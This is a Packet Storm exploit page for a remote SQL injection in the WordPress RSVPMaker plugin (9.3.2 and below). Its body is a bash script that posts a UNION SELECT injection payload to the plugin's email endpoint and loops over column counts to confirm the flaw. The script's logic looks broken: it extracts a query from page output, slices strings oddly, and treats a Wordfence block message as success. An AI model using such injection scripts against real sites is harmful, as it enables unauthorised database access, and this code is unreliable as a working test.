WordPress RSVPMaker plugin versions 9.3.2 and below suffer from a remote SQL injection vulnerability.
66e514c92c46238d6305ed7cb7d15ec7a2822168dde570f73013b430aa0764fc#!/bin/bash
# Set the URL of the website running the vulnerable plugin
url="https://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"
# Set the number of columns in the query
columns=5
response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')
payload="' UNION SELECT 1,2,3,4,5-- "
# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
if [ $? -eq 0 ]
then
echo "Vulnerability confirmed with $i columns"
break
fi
done
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed